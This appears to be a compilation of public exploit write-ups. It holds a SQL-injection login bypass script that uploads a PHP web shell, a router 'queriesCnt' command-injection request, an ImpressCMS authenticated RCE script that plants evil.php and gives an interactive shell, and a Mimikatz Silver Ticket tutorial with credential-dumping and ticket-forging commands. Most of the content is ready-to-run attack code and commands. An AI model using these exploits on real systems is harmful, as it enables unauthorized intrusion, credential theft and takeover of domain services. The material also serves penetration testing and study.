    ###########################################################
    ''')
else:
    try:
        url = sys.argv[1]
        print()
        print('[*] Trying to login...')
        time.sleep(1)
        login = url + '/classes/Login.php?f=login'
        payload_name = "shell.php"
        payload_file = r"""<?php @system($_GET['tapesh']); ?>"""
        session = requests.session()
        post_data = {"username": "'=''or'", "password": "'=''or'"}
        user_login = session.post(login, data=post_data)
        cookie = session.cookies.get_dict()
        if user_login.text == '{"status":"success"}':
            print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
            upload_url = url + "/classes/Users.php?f=save"
            cookies = cookie
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}
            data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name + "\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
            print('[*] Trying to shell...')
            time.sleep(2)
            try:
                print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')
                upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
                upload_check = f'{url}/uploads'
                r = requests.get(upload_check)
                if payload_name in r.text:
                    payloads = r.text.split('<a href="')
                    for load in payloads:
                        if payload_name in load:
                            payload = load.split('"')
                            payload = payload[0]
                        else:
                            pass
                else:
                    exit()
            except:
                print("Upload failed try again\n")
                exit()
            try:
                print("Check Your Target ;)\n")
            except:
                print("Failed to find shell\n")
        else:
            print("Login failed!\n")
    except:
        print("Something Went Wrong!\n")

#########################################################
#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir
23. # Exploit Title: Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)
# Date: 2021-09-15
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
# Version: All Version
# Tested on: Windows 10 Enterprise x64 , Linux

# [ About - Seowon 130-SLC router ] :
#The SLC-130 series are all-in-one LTE CPE that delights you in handling multi-purpose environments that require data and WiFi,
#Its sophisticated and stable operation helps you excel yourself at office and home,
#Improve communication with excellence and ease your life.

# [ Description ]:
#Execute commands without authentication as admin user ,
#To use it in all versions, we only enter the router ip & Port(if available) in the request
#The result of the request is visible on the browser page

# [ Sample RCE Request ] :

POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.1:443/diagnostic.html?t=201701020919
Content-Length: 183
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
Connection: keep-alive

Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;ls&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
24. # Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.impresscms.org/
# Software Link: https://www.impresscms.org/modules/downloads/
# Version: 1.4.2
# Category: Webapps
# Tested on: Linux/Windows

# ImpressCMS is a multilingual content management system for the web
# Contains an endpoint that allows remote access
# Autotask page misconfigured, causing security vulnerability
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123

import requests
import argparse
import sys
from time import sleep

session = requests.session()


def main():
    parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)')
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-l', '--login', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    args = parser.parse_args()
    print("\nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    exploit(args)


def countdown(time_sec):
    while time_sec:
        mins, secs = divmod(time_sec, 60)
        timeformat = '{:02d}'.format(secs)
        print("[" + timeformat + "] The task is expected to run!", end='\r')
        sleep(1)
        time_sec -= 1


def exploit(args):
    #Check http or https
    if args.host.startswith(('http://', 'https://')):
        print("[?] Check Url...\n")
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        sleep(2)
    else:
        print("\n[?] Check Adress...\n")
        args.host = "http://" + args.host
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        sleep(2)

    try:
        response = requests.get(args.host)
        if response.status_code != 200:
            print("[-] Address not reachable!")
            sleep(2)
            exit(1)
    except requests.ConnectionError as exception:
        print("[-] Address not reachable")
        exit(1)

    response = requests.get(args.host + "/evil.php")
    if response.status_code == 200:
        print("[*] Exploit file exists!\n")
        sleep(2)
        print("[+] Exploit Done!\n")
        while True:
            cmd = input("$ ")
            url = args.host + "/evil.php?cmd=" + cmd
            headers = {
                "Upgrade-Insecure-Requests": "1",
                "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
            }
            response = requests.post(url, headers=headers, timeout=5)
            if response.text == "":
                print(cmd + ": command not found\n")
            else:
                print(response.text)
    else:
        #Login and set cookie
        url = args.host + "/user.php"
        cookies = {
            "ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5"
        }
        headers = {
            "Cache-Control": "max-age=0",
            "Upgrade-Insecure-Requests": "1",
            "Origin": args.host,
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Referer": args.host,
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "en-US,en;q=0.9",
            "Connection": "close"
        }
        data = {
            "uname": args.login,
            "pass": args.password,
            "xoops_redirect": "/",
            "op": "login"
        }
        response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
        new_cookies = session.cookies.get("ICMSSESSION")

        if (new_cookies is None):
            print("[-] Login Failed...\n")
            print("Your username or password is incorrect.")
            sleep(2)
            exit(1)
        else:
            print("[+] Success Login...\n")
            sleep(2)
            # Create Tasks
            url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod"
            cookies = {
                "ICMSSESSION": new_cookies
            }
            headers = {
                "Cache-Control": "max-age=0",
                "Upgrade-Insecure-Requests": "1",
                "Origin": args.host,
                "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                "Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod",
                "Accept-Encoding": "gzip, deflate",
                "Accept-Language": "en-US,en;q=0.9",
                "Connection": "close"
            }
            data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_id\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_lastruntime\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_name\"\r\n\r\nrce\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_code\"\r\n\r\nfile_put_contents('../evil.php', \"<?php system(\\x24_GET['cmd']); ?>\");\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_repeat\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_interval\"\r\n\r\n0001\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_onfinish\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_enabled\"\r\n\r\n1\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_type\"\r\n\r\n:custom\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_addon_id\"\r\n\r\n\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"icms_page_before_form\"\r\n\r\n" + args.host + "/modules/system/admin.php?fct=autotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"op\"\r\n\r\naddautotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"modify_button\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk--\r\n"
            response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)

            if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks":
                print("[*] Task Create.\n")
                sleep(2)
                countdown(60)
                print("\n\n[+] Exploit Done!\n")
                sleep(2)
                while True:
                    cmd = input("$ ")
                    url = args.host + "/evil.php?cmd=" + cmd
                    headers = {
                        "Upgrade-Insecure-Requests": "1",
                        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
                    }
                    response = requests.post(url, headers=headers, timeout=5)
                    if response.text == "":
                        print(cmd + ": command not found\n")
                    else:
                        print(response.text)
            elif response.headers.get("location") == args.host + "/user.php":
                print("[!] Unauthorized user!\n\n")
                print("Requires user with create task permissions.")
                sleep(2)
            else:
                pass


if __name__ == '__main__':
    main()
25. 0x01 Silver Ticket definition

A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket, also called a service ticket. As shown in the figure below, there is no AS-REQ/AS-REP (steps 1 and 2) and no TGS-REQ/TGS-REP (steps 3 and 4) communication with the domain controller. Because the Silver Ticket is a forged TGS, it never communicates with the domain controller.

0x02 Silver Ticket characteristics

1. A Silver Ticket is a valid Ticket Granting Service (TGS) Kerberos ticket, because each server running a Kerberos-authenticated service encrypts and signs its own service tickets.
2. A Golden Ticket forges a TGT, which effectively grants access to any Kerberos service, whereas a Silver Ticket forges a TGS. This means a Silver Ticket is limited to a specific service on a specific server.
3. Most services do not validate the PAC (by sending the PAC checksum to the domain controller for PAC validation).
4. The attacker needs the password hash of the service account.
5. Because the TGS is forged, there is no TGT exchange, which means the DC is never consulted for validation.
6. Any event logs are on the target server only.

0x03 Creating a Silver Ticket

To create or forge a Silver Ticket, the attacker needs the password hash of the target service account. If the target service runs under a user account (such as MS SQL), the service account's password hash is required to create the ticket. Cracking service account passwords with kerberoast (https://github.com/nidem/kerberoast) is an effective way to identify password data for the target service. The most common service is the one hosted by the computer itself: the "CIFS" service that provides Windows file sharing. Because the computer itself hosts this service, the password data needed to create the Silver Ticket is the password hash of the associated computer account. When a computer is joined to Active Directory, a new computer account object is created and linked to the computer. The password and associated hashes are stored on the computer that owns the account, and the NTLM password hash is stored in the Active Directory database on the domain's domain controllers. If the attacker obtains administrative rights on the computer or can run code as local SYSTEM, the attacker can use Mimikatz to dump the AD computer account password from the system (the NTLM password hash is used to encrypt RC4 Kerberos tickets):

mimikatz "privilege::debug" "sekurlsa::logonpasswords"   # requires administrator privileges

0x04 Mimikatz Silver Ticket command

/domain - the fully qualified domain name, e.g. lab.adsecurity.org
/sid - the SID of the domain, e.g. S-1-5-21-1473643419-774954089-2222329127
/user - the domain user name
/groups (optional) - the groups the user belongs to
/ticket (optional) - provide a path and name to save the golden ticket file for later use, or use /ptt to inject the golden ticket into memory for immediate use
/ptt - as an alternative to /ticket, use this to inject the forged ticket into memory immediately for use
/id (optional) - the user RID; the Mimikatz default is 500 (the default Administrator account RID)
/startoffset (optional) - the start offset from which the ticket is valid (usually set to -10 or 0 when this option is used); the Mimikatz default is 0
/endin (optional) - the ticket lifetime; the Mimikatz default is 10 years, the Active Directory default Kerberos policy is 10 hours
/renewmax (optional) - the maximum renewal lifetime; the Mimikatz default is 10 years, the Active Directory default Kerberos policy is 7 days

1. Parameters required for a Silver Ticket

/target - the FQDN of the target server. FQDN (Fully Qualified Domain Name): a name that contains both the host name and the domain name (joined with ".").
/service - the Kerberos service running on the target server; the service principal name type, such as cifs, http, mssql, etc.
/rc4 - the NTLM hash of the service (computer account or user account)

2. Silver Ticket default groups

Domain Users SID: S-1-5-21<DOMAIN>-513
Domain Admins SID: S-1-5-21<DOMAIN>-512
Schema Admins SID: S-1-5-21<DOMAIN>-518
Enterprise Admins SID: S-1-5-21<DOMAIN>-519
Group Policy Creator Owners SID: S-1-5-21<DOMAIN>-520

3. Mimikatz command to create a Silver Ticket

The following Mimikatz command creates a Silver Ticket for the CIFS service on the server ADSMSWIN2K8R2.lab.adsecurity.org. To create the Silver Ticket successfully, Mimikatz must be run against an AD domain dump or on the local system to obtain the hash of the AD computer account password for ADSMSWIN2K8R2.lab.adsecurity.org. The NTLM password hash is used in the /rc4 parameter. The service SPN type must also be identified in the /service parameter. The FQDN of the target computer must be used in the /target parameter and the domain SID in the /sid parameter. The command is:

mimikatz "kerberos::golden /user:lukeskywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt" exit

0x05 Practical list of Silver Tickets for various services

1. Service list for Silver Tickets

Service type                                  Silver Ticket service(s)
WMI                                           HOST, RPCSS
PowerShell Remoting                           HOST, HTTP
WinRM                                         HOST, HTTP
Scheduled Tasks                               HOST
Windows File Share (CIFS)                     CIFS
LDAP operations, including Mimikatz DCSync    LDAP
Windows Remote Server Administration Tools    RPCSS, LDAP, CIFS

2. Silver Ticket for administrative access to Windows shares (CIFS)

Create a Silver Ticket for the "CIFS" service to obtain administrative rights to the Windows shares on the target computer. After injecting the CIFS Silver Ticket, the shares on the target computer, such as the c$ share, can be accessed and files can be copied to the share.

3. Silver Ticket with administrator rights on a Windows computer (HOST)

Create a Silver Ticket for the "HOST" service to obtain administrator rights over the Windows services covered on the target computer, which includes the permission to modify and create scheduled tasks. With a HOST Silver Ticket, new scheduled tasks can be created, or existing scheduled tasks can be modified.

4. Silver Tickets for PowerShell Remoting and WinRM (HTTP and WSMAN)

Create Silver Tickets for the "HTTP" and "WSMAN" services to obtain administrative rights for WinRM and/or PowerShell Remoting on the target system. After injecting the two HTTP and WSMAN Silver Tickets, PowerShell Remoting (or WinRM) can be used to get a shell on the target system. First, New-PSSession is the PowerShell cmdlet that creates a session to the remote system, then Enter-PSSession opens the remote shell.

5. Silver Ticket with administrator rights to connect to LDAP on a Windows computer

Create a Silver Ticket for the "LDAP" service to obtain administrative rights over the LDAP service on the target system (including Active Directory). With an LDAP Silver Ticket, the LDAP service can be accessed remotely to retrieve information about KRBTGT.

Note: lsadump::dcsync asks the DC to synchronize an object (account password information can be obtained). The required permissions include Administrators, Domain Admins, Enterprise Admins and the domain controller's computer account. Read-only domain controllers cannot read user password data by default.

6. Silver Ticket with administrator rights to connect to WMI on a Windows computer

Create Silver Tickets for the "HOST" and "RPCSS" services to execute commands remotely on the target system via WMI. After injecting these Silver Tickets, running "klist" confirms that the Kerberos TGS tickets (the Silver Tickets) have been injected into memory; WMIC can then be called, or Invoke-WmiMethod used with those credentials, to run commands on the target system.

Invoke-WmiMethod win32_process -ComputerName $computer -Credential $creds -Name create -ArgumentList "$runcommand"

7. Accessing the "CIFS" service on the domain controller

First, the following information is needed:
/domain
/sid
/target: the fully qualified domain name of the target server, here the full name of the domain controller
/service: the Kerberos service on the target server, here cifs
/rc4: the NTLM hash of the computer account, here the computer account of the domain controller host
/user: the user name to forge; silver can be used for testing

Run the following command on the domain controller to obtain the DC host's local administrator account:

mimikatz log 'sekurlsa::logonpasswords'

As shown in the figure.

Note: here the NTLM hash of the computer account, i.e. the user name win-8vvlrpiajb0$, must be found. With any other account it fails; that is, it must be the account the service runs under.

The information gathered above is:

/domain:test.local
/sid:S-1-5-21-4155807533-921486164-2767329826
/target:win-8vvlrpiajb0.test.local
/service:cifs
/rc4:D5304F9EA69523479560CA4EBB5A2155
/user:silver

Import the Silver Ticket with Mimikatz:

mimikatz 'kerberos::golden /domain:test.local /sid:S-1-5-21-4155807533-921486164-2767329826 /target:win-8vvlrpiajb0.test.local /service:cifs /rc4:D5304F9EA69523479560CA4EBB5A2155 /user:silver /ptt'

As shown in the figure, the domain controller's file share can now be accessed successfully.